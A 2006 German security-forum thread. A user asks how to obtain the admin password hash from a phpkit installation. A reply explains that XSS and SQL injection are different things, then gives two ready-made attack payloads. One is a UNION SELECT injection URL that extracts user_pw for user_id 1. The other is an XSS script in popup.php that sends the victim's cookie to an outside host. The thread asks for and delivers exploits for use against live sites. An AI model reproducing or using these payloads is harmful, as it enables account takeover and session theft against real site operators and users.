XSS Code für Injection...

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von rezzer, 20. März 2006 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 20. März 2006
    Moin,
    bräuchte mal einen XSS code den ich in eine SQL injection ein betten kann der mir dann die hash des
    admin aus gibt! (userid 1)
    Es handelt sich dabei um phpkit SQL injection...

    Wenn jemand nen xss script für sowas hat oder bereitstellen kann wäre ich
    sehr dankbar ! Bin auch per PM erreichbar !

    mfg

    ^c0rTeX
     
  2. 20. März 2006
    ? *verwirrt*
    1. XSS hat mit SQL soviel zutun wie Apfel mit Auto.
    Und man bettet auch keinen XSS Code in eine SQL-Injection ein.
    (würde sich zwar cool anhören ist aber extrem schwachsinnig..)

    Um per SQL Injection an den Hash zu kommen:
    Code:
    ../include.php?path=login/userinfo.php&id='%20UNION%20SELECT%201, 1,user_pw,1,1,1,1,1,1,1,1,1,1,1,1,user_pw,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1%20FROM%20phpkit_user%20where%20%20user_id=1%20and%20'1'='1
    
    Um per XSS an den Cookie des aktuellen Users zu kommen:
    Code:
    popup.php?img="><script>document.location='http://bla.com/cookie.cgi?' +document.cookie</script>
    

    So long
    XodoX:cGxzIHRoaW5rIGZpcnN0
     
  3. 20. März 2006
    Moin,
    Thx für deine hilfe hatte irgendwo gelesen das in die Injection
    ein XSS code rein muss...
    Naja ich lasse mich gerne beleren

    mfg

    rezzer
     
  4. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.